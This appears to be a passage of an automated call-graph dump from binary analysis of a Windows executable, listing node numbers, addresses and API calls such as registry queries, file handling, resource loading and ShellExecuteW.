93446->93450 93447 7ff7ec16e7da 93448->93447 93449 7ff7ec144c68 4 API calls 93448->93449 93449->93450 93450->93433 93452 7ff7ec127948 wcsftime 93451->93452 93453 7ff7ec129640 4 API calls 93452->93453 93454 7ff7ec127a02 93453->93454 93482 7ff7ec125680 93454->93482 93456 7ff7ec127a0c 93489 7ff7ec143a38 93456->93489 93460 7ff7ec127a2c 93505 7ff7ec124680 93460->93505 93462 7ff7ec127a3d 93463 7ff7ec129640 4 API calls 93462->93463 93464 7ff7ec127a47 93463->93464 93509 7ff7ec12a854 93464->93509 93467 7ff7ec16d05c RegQueryValueExW 93468 7ff7ec16d131 RegCloseKey 93467->93468 93469 7ff7ec16d08f 93467->93469 93471 7ff7ec127a83 Concurrency::wait 93468->93471 93474 7ff7ec16d147 wcscat Concurrency::wait 93468->93474 93470 7ff7ec144c68 4 API calls 93469->93470 93472 7ff7ec16d0b2 93470->93472 93471->93381 93475 7ff7ec16d0bf RegQueryValueExW 93472->93475 93473 7ff7ec129d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93473->93474 93474->93471 93474->93473 93480 7ff7ec124680 4 API calls 93474->93480 93513 7ff7ec12ec00 93474->93513 93476 7ff7ec16d112 93475->93476 93477 7ff7ec16d0f3 93475->93477 93476->93468 93478 7ff7ec127cf4 4 API calls 93477->93478 93478->93476 93480->93474 93481->93383 93518 7ff7ec168f90 93482->93518 93485 7ff7ec12ec00 4 API calls 93486 7ff7ec1256b4 93485->93486 93520 7ff7ec1256d4 93486->93520 93488 7ff7ec1256c1 Concurrency::wait 93488->93456 93490 7ff7ec168f90 wcsftime 93489->93490 93491 7ff7ec143a44 GetFullPathNameW 93490->93491 93492 7ff7ec143a74 93491->93492 93493 7ff7ec127cf4 4 API calls 93492->93493 93494 7ff7ec127a1b 93493->93494 93495 7ff7ec1271f8 93494->93495 93496 7ff7ec12721c 93495->93496 93499 7ff7ec16cd0c 93495->93499 93497 7ff7ec127274 93496->93497 93502 7ff7ec16cd66 memcpy_s 93496->93502 93530 7ff7ec12b960 93497->93530 93501 7ff7ec144c68 4 API calls 93499->93501 93500 7ff7ec127283 memcpy_s 93500->93460 93501->93502 93503 7ff7ec144c68 4 API calls 93502->93503 93504 7ff7ec16cdda memcpy_s 93503->93504 93506 7ff7ec12469f 93505->93506 93508 7ff7ec1246c8 memcpy_s 93505->93508 93507 7ff7ec144c68 4 API calls 93506->93507 93507->93508 93508->93462 93510 7ff7ec12a87a 93509->93510 93511 7ff7ec127a51 RegOpenKeyExW 93509->93511 93512 7ff7ec144c68 4 API calls 93510->93512 93511->93467 93511->93471 93512->93511 93514 7ff7ec12ec1d 93513->93514 93515 7ff7ec17a5a2 93514->93515 93516 7ff7ec144c68 4 API calls 93514->93516 93517 7ff7ec12ec55 memcpy_s 93516->93517 93517->93474 93519 7ff7ec12568c GetModuleFileNameW 93518->93519 93519->93485 93521 7ff7ec168f90 wcsftime 93520->93521 93522 7ff7ec1256e9 GetFullPathNameW 93521->93522 93523 7ff7ec16c03a 93522->93523 93524 7ff7ec125712 93522->93524 93526 7ff7ec12a854 4 API calls 93523->93526 93525 7ff7ec127cf4 4 API calls 93524->93525 93527 7ff7ec12571c 93525->93527 93526->93527 93527->93527 93528 7ff7ec12dda4 4 API calls 93527->93528 93529 7ff7ec125785 93528->93529 93529->93488 93531 7ff7ec12b981 93530->93531 93534 7ff7ec12b976 memcpy_s 93530->93534 93532 7ff7ec144c68 4 API calls 93531->93532 93533 7ff7ec16ef2a 93531->93533 93532->93534 93534->93500 93572 7ff7ec1282b4 93535->93572 93538 7ff7ec1282b4 4 API calls 93539 7ff7ec127f3a 93538->93539 93540 7ff7ec129640 4 API calls 93539->93540 93541 7ff7ec127f46 93540->93541 93542 7ff7ec127cf4 4 API calls 93541->93542 93543 7ff7ec127f59 93542->93543 93579 7ff7ec142d5c 6 API calls 93543->93579 93545 7ff7ec127fa5 93546 7ff7ec129640 4 API calls 93545->93546 93547 7ff7ec127fb1 93546->93547 93548 7ff7ec129640 4 API calls 93547->93548 93549 7ff7ec127fbd 93548->93549 93550 7ff7ec129640 4 API calls 93549->93550 93551 7ff7ec127fc9 93550->93551 93552 7ff7ec129640 4 API calls 93551->93552 93553 7ff7ec12800f 93552->93553 93554 7ff7ec129640 4 API calls 93553->93554 93555 7ff7ec1280f7 93554->93555 93580 7ff7ec13ef88 93555->93580 93557 7ff7ec128103 93587 7ff7ec13eec8 93557->93587 93559 7ff7ec12812f 93560 7ff7ec129640 4 API calls 93559->93560 93561 7ff7ec12813b 93560->93561 93598 7ff7ec136d40 93561->93598 93565 7ff7ec1281ac 93566 7ff7ec1281be GetStdHandle 93565->93566 93567 7ff7ec128220 OleInitialize 93566->93567 93568 7ff7ec16d350 93566->93568 93567->93386 93615 7ff7ec19ffc8 CreateThread 93568->93615 93570 7ff7ec16d367 CloseHandle 93571->93388 93573 7ff7ec129640 4 API calls 93572->93573 93574 7ff7ec1282c6 93573->93574 93575 7ff7ec129640 4 API calls 93574->93575 93576 7ff7ec1282cf 93575->93576 93577 7ff7ec129640 4 API calls 93576->93577 93578 7ff7ec127f2e 93577->93578 93578->93538 93579->93545 93581 7ff7ec129640 4 API calls 93580->93581 93582 7ff7ec13efa3 93581->93582 93583 7ff7ec129640 4 API calls 93582->93583 93584 7ff7ec13efac 93583->93584 93585 7ff7ec129640 4 API calls 93584->93585 93586 7ff7ec13f02e 93585->93586 93586->93557 93588 7ff7ec13eede 93587->93588 93589 7ff7ec129640 4 API calls 93588->93589 93590 7ff7ec13eeea 93589->93590 93591 7ff7ec129640 4 API calls 93590->93591 93592 7ff7ec13eef6 93591->93592 93593 7ff7ec129640 4 API calls 93592->93593 93594 7ff7ec13ef02 93593->93594 93595 7ff7ec129640 4 API calls 93594->93595 93596 7ff7ec13ef0e 93595->93596 93597 7ff7ec13ef68 RegisterWindowMessageW 93596->93597 93597->93559 93599 7ff7ec136db9 93598->93599 93605 7ff7ec136d80 93598->93605 93616 7ff7ec145114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 93599->93616 93607 7ff7ec12816b 93605->93607 93617 7ff7ec145114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 93605->93617 93608 7ff7ec1439a8 93607->93608 93609 7ff7ec18a502 93608->93609 93614 7ff7ec1439cc 93608->93614 93618 7ff7ec12ee20 5 API calls Concurrency::wait 93609->93618 93611 7ff7ec18a50e 93619 7ff7ec12ee20 5 API calls Concurrency::wait 93611->93619 93613 7ff7ec18a52d 93614->93565 93615->93570 93618->93611 93619->93613 93621 7ff7ec129640 4 API calls 93620->93621 93622 7ff7ec12778f 93621->93622 93628 7ff7ec126f24 93622->93628 93624 7ff7ec12782c 93625 7ff7ec121051 93624->93625 93631 7ff7ec127410 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93624->93631 93627 7ff7ec144ebc 34 API calls _onexit 93625->93627 93627->93393 93632 7ff7ec126f60 93628->93632 93631->93624 93633 7ff7ec126f52 93632->93633 93634 7ff7ec126f85 93632->93634 93633->93624 93634->93633 93635 7ff7ec126f93 RegOpenKeyExW 93634->93635 93635->93633 93636 7ff7ec126faf RegQueryValueExW 93635->93636 93637 7ff7ec126ff5 RegCloseKey 93636->93637 93638 7ff7ec126fdd 93636->93638 93637->93633 93638->93637 93640 7ff7ec145947 GetStartupInfoW 93639->93640 93640->93283 93699 7ff7ec15b9bc EnterCriticalSection 93641->93699 93643 7ff7ec1492e4 93644 7ff7ec15ba10 _isindst LeaveCriticalSection 93643->93644 93645 7ff7ec12376e 93644->93645 93646 7ff7ec149334 93645->93646 93647 7ff7ec14933d 93646->93647 93648 7ff7ec123778 93646->93648 93700 7ff7ec1555d4 15 API calls _set_fmode 93647->93700 93652 7ff7ec1236e8 SystemParametersInfoW SystemParametersInfoW 93648->93652 93650 7ff7ec149342 93701 7ff7ec15b164 31 API calls _invalid_parameter_noinfo 93650->93701 93652->93317 93654 7ff7ec1237cd wcsftime 93653->93654 93655 7ff7ec129640 4 API calls 93654->93655 93656 7ff7ec1237dd GetCurrentDirectoryW 93655->93656 93702 7ff7ec1257a0 93656->93702 93658 7ff7ec123807 IsDebuggerPresent 93659 7ff7ec16b872 MessageBoxA 93658->93659 93660 7ff7ec123815 93658->93660 93661 7ff7ec16b894 93659->93661 93660->93661 93662 7ff7ec123839 93660->93662 93812 7ff7ec12e278 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93661->93812 93776 7ff7ec123f04 93662->93776 93666 7ff7ec123860 GetFullPathNameW 93667 7ff7ec127cf4 4 API calls 93666->93667 93668 7ff7ec1238a6 93667->93668 93792 7ff7ec123f9c 93668->93792 93669 7ff7ec1238bf 93671 7ff7ec16b8dc SetCurrentDirectoryW 93669->93671 93672 7ff7ec1238c7 93669->93672 93671->93672 93673 7ff7ec1238d0 93672->93673 93813 7ff7ec18d540 AllocateAndInitializeSid CheckTokenMembership FreeSid 93672->93813 93808 7ff7ec123b84 7 API calls 93673->93808 93676 7ff7ec16b8f8 93676->93673 93679 7ff7ec16b90c 93676->93679 93680 7ff7ec125680 6 API calls 93679->93680 93682 7ff7ec16b916 93680->93682 93681 7ff7ec1238da 93683 7ff7ec126258 46 API calls 93681->93683 93686 7ff7ec1238ef 93681->93686 93684 7ff7ec12ec00 4 API calls 93682->93684 93683->93686 93685 7ff7ec16b927 93684->93685 93688 7ff7ec16b94d 93685->93688 93689 7ff7ec16b930 93685->93689 93687 7ff7ec123913 93686->93687 93690 7ff7ec125d88 Shell_NotifyIconW 93686->93690 93692 7ff7ec12391f SetCurrentDirectoryW 93687->93692 93694 7ff7ec1271f8 4 API calls 93688->93694 93691 7ff7ec1271f8 4 API calls 93689->93691 93690->93687 93693 7ff7ec16b93c 93691->93693 93695 7ff7ec123934 Concurrency::wait 93692->93695 93814 7ff7ec127c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 93693->93814 93697 7ff7ec16b963 GetForegroundWindow ShellExecuteW 93694->93697 93695->93319 93698 7ff7ec16b99f Concurrency::wait 93697->93698 93698->93687 93700->93650 93701->93648 93703 7ff7ec129640 4 API calls 93702->93703 93704 7ff7ec1257d7 93703->93704 93815 7ff7ec129bbc 93704->93815 93706 7ff7ec1257fe 93707 7ff7ec125680 6 API calls 93706->93707 93708 7ff7ec125812 93707->93708 93709 7ff7ec12ec00 4 API calls 93708->93709 93710 7ff7ec125823 93709->93710 93829 7ff7ec126460 93710->93829 93713 7ff7ec16c05e 93906 7ff7ec1a2948 93713->93906 93714 7ff7ec12584e Concurrency::wait 93855 7ff7ec12e0a8 93714->93855 93716 7ff7ec16c074 93717 7ff7ec16c081 93716->93717 93719 7ff7ec12652c 63 API calls 93716->93719 93924 7ff7ec12652c 93717->93924 93719->93717 93720 7ff7ec12586a 93722 7ff7ec12ec00 4 API calls 93720->93722 93723 7ff7ec125888 93722->93723 93728 7ff7ec16c099 93723->93728 93859 7ff7ec12eff8 93723->93859 93725 7ff7ec1258ad Concurrency::wait 93726 7ff7ec12ec00 4 API calls 93725->93726 93727 7ff7ec1258d7 93726->93727 93727->93728 93729 7ff7ec12eff8 46 API calls 93727->93729 93730 7ff7ec125ab4 4 API calls 93728->93730 93732 7ff7ec1258fc Concurrency::wait 93729->93732 93731 7ff7ec16c0e1 93730->93731 93733 7ff7ec125ab4 4 API calls 93731->93733 93735 7ff7ec129640 4 API calls 93732->93735 93734 7ff7ec16c103 93733->93734 93738 7ff7ec125680 6 API calls 93734->93738 93736 7ff7ec12591f 93735->93736 93872 7ff7ec125ab4 93736->93872 93740 7ff7ec16c12b 93738->93740 93742 7ff7ec125ab4 4 API calls 93740->93742 93744 7ff7ec16c139 93742->93744 93743 7ff7ec125941 93743->93728 93745 7ff7ec125949 93743->93745 93746 7ff7ec12e0a8 4 API calls 93744->93746 93747 7ff7ec148e28 wcsftime 37 API calls 93745->93747 93748 7ff7ec16c14a 93746->93748 93749 7ff7ec125958 93747->93749 93750 7ff7ec125ab4 4 API calls 93748->93750 93749->93731 93751 7ff7ec125960 93749->93751 93752 7ff7ec16c15b 93750->93752 93753 7ff7ec148e28 wcsftime 37 API calls 93751->93753 93756 7ff7ec12e0a8 4 API calls 93752->93756 93754 7ff7ec12596f 93753->93754 93754->93734 93755 7ff7ec125977 93754->93755 93757 7ff7ec148e28 wcsftime 37 API calls 93755->93757 93758 7ff7ec16c172 93756->93758 93759 7ff7ec125986 93757->93759 93760 7ff7ec125ab4 4 API calls 93758->93760 93761 7ff7ec1259c6 93759->93761 93764 7ff7ec125ab4 4 API calls 93759->93764 93763 7ff7ec16c183 93760->93763 93761->93752 93762 7ff7ec1259d3 93761->93762 93895 7ff7ec12df90 93762->93895 93765 7ff7ec1259a8 93764->93765 93766 7ff7ec12e0a8 4 API calls 93765->93766 93767 7ff7ec1259b5 93766->93767 93769 7ff7ec125ab4 4 API calls 93767->93769 93769->93761 93772 7ff7ec12d670 5 API calls 93773 7ff7ec125a12 93772->93773 93773->93772 93774 7ff7ec125ab4 4 API calls 93773->93774 93775 7ff7ec125a60 Concurrency::wait 93773->93775 93774->93773 93775->93658 93777 7ff7ec123f29 wcsftime 93776->93777 93778 7ff7ec16ba2c __scrt_fastfail 93777->93778 93779 7ff7ec123f4b 93777->93779 93781 7ff7ec16ba4d GetOpenFileNameW 93778->93781 93780 7ff7ec1256d4 5 API calls 93779->93780 93782 7ff7ec123f56 93780->93782 93783 7ff7ec123858 93781->93783 93784 7ff7ec16bab0 93781->93784 94269 7ff7ec123eb4 93782->94269 93783->93666 93783->93669 93786 7ff7ec127cf4 4 API calls 93784->93786 93788 7ff7ec16babc 93786->93788 93790 7ff7ec123f6c 94287 7ff7ec126394 93790->94287 93793 7ff7ec123fb6 wcsftime 93792->93793 94330 7ff7ec129734 93793->94330 93795 7ff7ec123fc4 93807 7ff7ec124050 93795->93807 94340 7ff7ec124d28 77 API calls 93795->94340 93797 7ff7ec123fd3 93797->93807 94341 7ff7ec124b0c 79 API calls Concurrency::wait 93797->94341 93799 7ff7ec123fe0 93800 7ff7ec123fe8 GetFullPathNameW 93799->93800 93799->93807 93801 7ff7ec127cf4 4 API calls 93800->93801 93802 7ff7ec124014 93801->93802 93803 7ff7ec127cf4 4 API calls 93802->93803 93804 7ff7ec124028 93803->93804 93805 7ff7ec16bac2 wcscat 93804->93805 93806 7ff7ec127cf4 4 API calls 93804->93806 93806->93807 93807->93669 94345 7ff7ec123d90 7 API calls 93808->94345 93810 7ff7ec1238d5 93811 7ff7ec123cbc CreateWindowExW CreateWindowExW ShowWindow ShowWindow 93810->93811 93812->93669 93813->93676 93814->93688 93816 7ff7ec129be5 wcsftime 93815->93816 93817 7ff7ec127cf4 4 API calls 93816->93817 93818 7ff7ec129c1b 93816->93818 93817->93818 93826 7ff7ec129c4a Concurrency::wait 93818->93826 93930 7ff7ec129d84 93818->93930 93820 7ff7ec12ec00 4 API calls 93821 7ff7ec129d4a 93820->93821 93823 7ff7ec124680 4 API calls 93821->93823 93822 7ff7ec12ec00 4 API calls 93822->93826 93824 7ff7ec129d57 Concurrency::wait 93823->93824 93824->93706 93825 7ff7ec124680 4 API calls 93825->93826 93826->93822 93826->93825 93827 7ff7ec129d21 93826->93827 93828 7ff7ec129d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93826->93828 93827->93820 93827->93824 93828->93826 93933 7ff7ec126d64 93829->93933 93832 7ff7ec12649d 93834 7ff7ec1264ba FreeLibrary 93832->93834 93835 7ff7ec1264c0 93832->93835 93833 7ff7ec126d64 2 API calls 93833->93832 93834->93835 93937 7ff7ec1548e0 93835->93937 93838 7ff7ec1264db LoadLibraryExW 93956 7ff7ec126cc4 93838->93956 93839 7ff7ec16c8f6 93841 7ff7ec12652c 63 API calls 93839->93841 93843 7ff7ec16c8fe 93841->93843 93845 7ff7ec126cc4 3 API calls 93843->93845 93847 7ff7ec16c907 93845->93847 93846 7ff7ec126505 93846->93847 93848 7ff7ec126512 93846->93848 93978 7ff7ec1267d8 93847->93978 93849 7ff7ec12652c 63 API calls 93848->93849 93851 7ff7ec125846 93849->93851 93851->93713 93851->93714 93854 7ff7ec16c93f 93856 7ff7ec12e0bb 93855->93856 93857 7ff7ec12e0b6 93855->93857 93856->93720 94181 7ff7ec12f0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93857->94181 94182 7ff7ec131a30 93859->94182 93861 7ff7ec12f029 93862 7ff7ec17a7a8 93861->93862 93863 7ff7ec12f040 93861->93863 94198 7ff7ec12ee20 5 API calls Concurrency::wait 93862->94198 93866 7ff7ec144c68 4 API calls 93863->93866 93865 7ff7ec17a7bc 93867 7ff7ec12f066 93866->93867 93869 7ff7ec12f08f 93867->93869 94197 7ff7ec12f0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93867->94197 94193 7ff7ec12f1bc 93869->94193 93871 7ff7ec12f0c6 93871->93725 93873 7ff7ec125ae4 93872->93873 93874 7ff7ec125ac6 93872->93874 93876 7ff7ec127cf4 4 API calls 93873->93876 93875 7ff7ec12e0a8 4 API calls 93874->93875 93877 7ff7ec12592d 93875->93877 93876->93877 93878 7ff7ec148e28 93877->93878 93879 7ff7ec148ea4 93878->93879 93880 7ff7ec148e3f 93878->93880 94202 7ff7ec148d98 35 API calls 2 library calls 93879->94202 93889 7ff7ec148e63 93880->93889 94200 7ff7ec1555d4 15 API calls _set_fmode 93880->94200 93883 7ff7ec148ed6 93886 7ff7ec148ee2 93883->93886 93894 7ff7ec148ef9 93883->93894 93884 7ff7ec148e49 94201 7ff7ec15b164 31 API calls _invalid_parameter_noinfo 93884->94201 94203 7ff7ec1555d4 15 API calls _set_fmode 93886->94203 93887 7ff7ec148e54 93887->93743 93889->93743 93890 7ff7ec148ee7 94204 7ff7ec15b164 31 API calls _invalid_parameter_noinfo 93890->94204 93892 7ff7ec148ef2 93892->93743 93893 7ff7ec152c80 37 API calls wcsftime 93893->93894 93894->93892 93894->93893 93896 7ff7ec12dfac 93895->93896 93897 7ff7ec144c68 4 API calls 93896->93897 93898 7ff7ec1259f5 93896->93898 93897->93898 93899 7ff7ec12d670 93898->93899 93900 7ff7ec12d698 93899->93900 93904 7ff7ec12d6a2 93900->93904 94205 7ff7ec12880c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93900->94205 93903 7ff7ec179d43 93905 7ff7ec12d7de 93904->93905 94206 7ff7ec12ee20 5 API calls Concurrency::wait 93904->94206 93905->93773 93907 7ff7ec1a29c8 93906->93907 94207 7ff7ec1a2b70 93907->94207 93910 7ff7ec1267d8 45 API calls 93911 7ff7ec1a2a03 93910->93911 93912 7ff7ec1267d8 45 API calls 93911->93912 93913 7ff7ec1a2a23 93912->93913 93914 7ff7ec1267d8 45 API calls 93913->93914 93915 7ff7ec1a2a49 93914->93915 93916 7ff7ec1267d8 45 API calls 93915->93916 93917 7ff7ec1a2a6d 93916->93917 93918 7ff7ec1267d8 45 API calls 93917->93918 93919 7ff7ec1a2ac5 93918->93919 93920 7ff7ec1a240c 32 API calls 93919->93920 93921 7ff7ec1a2ada 93920->93921 93923 7ff7ec1a29de 93921->93923 94212 7ff7ec1a1d48 93921->94212 93923->93716 93925 7ff7ec12653d 93924->93925 93926 7ff7ec126542 93924->93926 93927 7ff7ec154970 62 API calls 93925->93927 93928 7ff7ec126558 93926->93928 93929 7ff7ec12656f FreeLibrary 93926->93929 93927->93926 93928->93728 93929->93928 93931 7ff7ec12a7c0 4 API calls 93930->93931 93932 7ff7ec129d99 93931->93932 93932->93818 93934 7ff7ec126490 93933->93934 93935 7ff7ec126d74 LoadLibraryA 93933->93935 93934->93832 93934->93833 93935->93934 93936 7ff7ec126d89 GetProcAddress 93935->93936 93936->93934 93938 7ff7ec1547fc 93937->93938 93939 7ff7ec15482a 93938->93939 93942 7ff7ec15485c 93938->93942 93998 7ff7ec1555d4 15 API calls _set_fmode 93939->93998 93941 7ff7ec15482f 93999 7ff7ec15b164 31 API calls _invalid_parameter_noinfo 93941->93999 93944 7ff7ec15486f 93942->93944 93945 7ff7ec154862 93942->93945 93986 7ff7ec15feb4 93944->93986 94000 7ff7ec1555d4 15 API calls _set_fmode 93945->94000 93949 7ff7ec154883 94001 7ff7ec1555d4 15 API calls _set_fmode 93949->94001 93950 7ff7ec154890 93993 7ff7ec160304 93950->93993 93953 7ff7ec1548a3 94002 7ff7ec14df60 LeaveCriticalSection 93953->94002 93955 7ff7ec1264cf 93955->93838 93955->93839 94140 7ff7ec126d1c 93956->94140 93959 7ff7ec126cf1 93961 7ff7ec126d0f FreeLibrary 93959->93961 93962 7ff7ec1264f7 93959->93962 93960 7ff7ec126d1c 2 API calls 93960->93959 93961->93962 93963 7ff7ec126580 93962->93963 93964 7ff7ec144c68 4 API calls 93963->93964 93965 7ff7ec1265b5 memcpy_s 93964->93965 93966 7ff7ec16c9f5 93965->93966 93967 7ff7ec126740 CreateStreamOnHGlobal 93965->93967 93968 7ff7ec126602 93965->93968 94144 7ff7ec1a2e00 45 API calls 93966->94144 93967->93968 93971 7ff7ec126759 FindResourceExW 93967->93971 93969 7ff7ec16c9fd 93968->93969 93972 7ff7ec16c97e LoadResource 93968->93972 93973 7ff7ec1267d8 45 API calls 93968->93973 93977 7ff7ec1266e8 93968->93977 93976 7ff7ec1267d8 45 API calls 93969->93976 93971->93968 93972->93968 93974 7ff7ec16c997 SizeofResource 93972->93974 93973->93968 93974->93968 93975 7ff7ec16c9ae LockResource 93974->93975 93975->93968 93976->93977 93977->93846 93979 7ff7ec1267f7 93978->93979 93980 7ff7ec16ca6c 93978->93980 94145 7ff7ec154c5c 93979->94145 93983 7ff7ec1a240c 94164 7ff7ec1a2200 93983->94164 93985 7ff7ec1a2430 93985->93854 94003 7ff7ec15b9bc EnterCriticalSection 93986->94003 93988 7ff7ec15fecb 93989 7ff7ec15ff54 18 API calls 93988->93989 93990 7ff7ec15fed6 93989->93990 93991 7ff7ec15ba10 _isindst LeaveCriticalSection 93990->93991 93992 7ff7ec154879 93991->93992 93992->93949 93992->93950 94004 7ff7ec160040 93993->94004 93996 7ff7ec16035e 93996->93953 93998->93941 93999->93955 94000->93955 94001->93955 94009 7ff7ec16007d try_get_function 94004->94009 94006 7ff7ec1602de 94023 7ff7ec15b164 31 API calls _invalid_parameter_noinfo 94006->94023 94008 7ff7ec16021a 94008->93996 94016 7ff7ec167738 94008->94016 94009->94009 94012 7ff7ec160211 94009->94012 94019 7ff7ec14db68 37 API calls 4 library calls 94009->94019 94011 7ff7ec160277 94011->94012 94020 7ff7ec14db68 37 API calls 4 library calls 94011->94020 94012->94008 94022 7ff7ec1555d4 15 API calls _set_fmode 94012->94022 94014 7ff7ec16029a 94014->94012 94021 7ff7ec14db68 37 API calls 4 library calls 94014->94021 94024 7ff7ec166d04 94016->94024 94019->94011 94020->94014 94021->94012 94022->94006 94023->94008 94025 7ff7ec166d28 94024->94025 94026 7ff7ec166d40 94024->94026 94078 7ff7ec1555d4 15 API calls _set_fmode 94025->94078 94026->94025 94029 7ff7ec166d6d 94026->94029 94028 7ff7ec166d2d 94079 7ff7ec15b164 31 API calls _invalid_parameter_noinfo 94028->94079 94035 7ff7ec167348 94029->94035 94032 7ff7ec166d39 94032->93996 94081 7ff7ec167078 94035->94081 94038 7ff7ec1673bc 94113 7ff7ec1555b4 15 API calls _set_fmode 94038->94113 94039 7ff7ec1673d3 94101 7ff7ec15e418 94039->94101 94042 7ff7ec1673c1 94114 7ff7ec1555d4 15 API calls _set_fmode 94042->94114 94044 7ff7ec1673f7 CreateFileW 94046 7ff7ec1674eb GetFileType 94044->94046 94047 7ff7ec167469 94044->94047 94045 7ff7ec1673df 94115 7ff7ec1555b4 15 API calls _set_fmode 94045->94115 94052 7ff7ec1674f8 GetLastError 94046->94052 94053 7ff7ec167549 94046->94053 94050 7ff7ec1674b8 GetLastError 94047->94050 94055 7ff7ec167478 CreateFileW 94047->94055 94117 7ff7ec155564 15 API calls 2 library calls 94050->94117 94051 7ff7ec166d95 94051->94032 94080 7ff7ec15e3f4 LeaveCriticalSection 94051->94080 94118 7ff7ec155564 15 API calls 2 library calls 94052->94118 94120 7ff7ec15e334 16 API calls 2 library calls 94053->94120 94054 7ff7ec1673e4 94116 7ff7ec1555d4 15 API calls _set_fmode 94054->94116 94055->94046 94055->94050 94059 7ff7ec167507 CloseHandle 94059->94042 94061 7ff7ec167539 94059->94061 94119 7ff7ec1555d4 15 API calls _set_fmode 94061->94119 94062 7ff7ec167568 94064 7ff7ec1675b5 94062->94064 94121 7ff7ec167284 67 API calls 2 library calls 94062->94121 94069 7ff7ec1675ec 94064->94069 94122 7ff7ec166de4 67 API calls 4 library calls 94064->94122 94065 7ff7ec16753e 94065->94042 94068 7ff7ec1675e8 94068->94069 94070 7ff7ec1675fe 94068->94070 94123 7ff7ec1604b8 94069->94123 94070->94051 94072 7ff7ec167681 CloseHandle CreateFileW 94070->94072 94073 7ff7ec1676cb GetLastError 94072->94073 94074 7ff7ec1676f9 94072->94074 94138 7ff7ec155564 15 API calls 2 library calls 94073->94138 94074->94051 94076 7ff7ec1676d8 94139 7ff7ec15e548 16 API calls 2 library calls 94076->94139 94078->94028 94079->94032 94082 7ff7ec1670a4 94081->94082 94090 7ff7ec1670be 94081->94090 94083 7ff7ec1555d4 _set_fmode 15 API calls 94082->94083 94082->94090 94084 7ff7ec1670b3 94083->94084 94085 7ff7ec15b164 _invalid_parameter_noinfo 31 API calls 94084->94085 94085->94090 94086 7ff7ec16718c 94088 7ff7ec152554 31 API calls 94086->94088 94098 7ff7ec1671ec 94086->94098 94087 7ff7ec16713b 94087->94086 94089 7ff7ec1555d4 _set_fmode 15 API calls 94087->94089 94091 7ff7ec1671e8 94088->94091 94092 7ff7ec167181 94089->94092 94090->94087 94093 7ff7ec1555d4 _set_fmode 15 API calls 94090->94093 94096 7ff7ec16726b 94091->94096 94091->94098 94094 7ff7ec15b164 _invalid_parameter_noinfo 31 API calls 94092->94094 94095 7ff7ec167130 94093->94095 94094->94086 94097 7ff7ec15b164 _invalid_parameter_noinfo 31 API calls 94095->94097 94099 7ff7ec15b184 _invalid_parameter_noinfo 16 API calls 94096->94099 94097->94087 94098->94038 94098->94039 94100 7ff7ec167280 94099->94100 94102 7ff7ec15b9bc _isindst EnterCriticalSection 94101->94102 94108 7ff7ec15e43b 94102->94108 94103 7ff7ec15e464 94105 7ff7ec15e170 16 API calls 94103->94105 94104 7ff7ec15ba10 _isindst LeaveCriticalSection 94106 7ff7ec15e52a 94104->94106 94107 7ff7ec15e469 94105->94107 94106->94044 94106->94045 94110 7ff7ec15e310 wprintf EnterCriticalSection 94107->94110 94111 7ff7ec15e487 94107->94111 94108->94103 94109 7ff7ec15e4c2 EnterCriticalSection 94108->94109 94108->94111 94109->94111 94112 7ff7ec15e4d1 LeaveCriticalSection 94109->94112 94110->94111 94111->94104 94112->94108 94113->94042 94114->94051 94115->94054 94116->94042 94117->94042 94118->94059 94119->94065 94120->94062 94121->94064 94122->94068 94124 7ff7ec15e604 31 API calls 94123->94124 94126 7ff7ec1604cc 94124->94126 94125 7ff7ec1604d2 94128 7ff7ec15e548 16 API calls 94125->94128 94126->94125 94127 7ff7ec16050c 94126->94127 94129 7ff7ec15e604 31 API calls 94126->94129 94127->94125 94130 7ff7ec15e604 31 API calls 94127->94130 94131 7ff7ec160534 94128->94131 94133 7ff7ec1604ff 94129->94133 94134 7ff7ec160518 CloseHandle 94130->94134 94132 7ff7ec160560 94131->94132 94135 7ff7ec155564 fread_s 15 API calls 94131->94135 94132->94051 94136 7ff7ec15e604 31 API calls 94133->94136 94134->94125 94137 7ff7ec160525 GetLastError 94134->94137 94135->94132 94136->94127 94137->94125 94138->94076 94139->94074 94141 7ff7ec126d2c LoadLibraryA 94140->94141 94142 7ff7ec126ce3 94140->94142 94141->94142 94143 7ff7ec126d41 GetProcAddress 94141->94143 94142->93959 94142->93960 94143->94142 94144->93969 94148 7ff7ec154c7c 94145->94148 94149 7ff7ec12680a 94148->94149 94150 7ff7ec154ca6 94148->94150 94149->93983 94150->94149 94151 7ff7ec154cd7 94150->94151 94152 7ff7ec154cb5 __scrt_fastfail 94150->94152 94163 7ff7ec14df54 EnterCriticalSection 94151->94163 94161 7ff7ec1555d4 15 API calls _set_fmode 94152->94161 94156 7ff7ec154cca 94162 7ff7ec15b164 31 API calls _invalid_parameter_noinfo 94156->94162 94161->94156 94162->94149 94167 7ff7ec1547bc 94164->94167 94166 7ff7ec1a2210 94166->93985 94170 7ff7ec154724 94167->94170 94171 7ff7ec154746 94170->94171 94172 7ff7ec154732 94170->94172 94174 7ff7ec154742 94171->94174 94180 7ff7ec15bef8 6 API calls __crtLCMapStringW 94171->94180 94178 7ff7ec1555d4 15 API calls _set_fmode 94172->94178 94174->94166 94175 7ff7ec154737 94179 7ff7ec15b164 31 API calls _invalid_parameter_noinfo 94175->94179 94178->94175 94179->94174 94180->94174 94181->93856 94183 7ff7ec131a48 94182->94183 94184 7ff7ec131c5f 94182->94184 94187 7ff7ec131a90 94183->94187 94199 7ff7ec145114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94183->94199 94184->93861 94187->93861 94194 7ff7ec12f1ce 94193->94194 94196 7ff7ec12f1d8 94193->94196 94195 7ff7ec131a30 45 API calls 94194->94195 94195->94196 94196->93871 94197->93869 94198->93865 94200->93884 94201->93887 94202->93883 94203->93890 94204->93892 94205->93904 94206->93903 94209 7ff7ec1a2bae 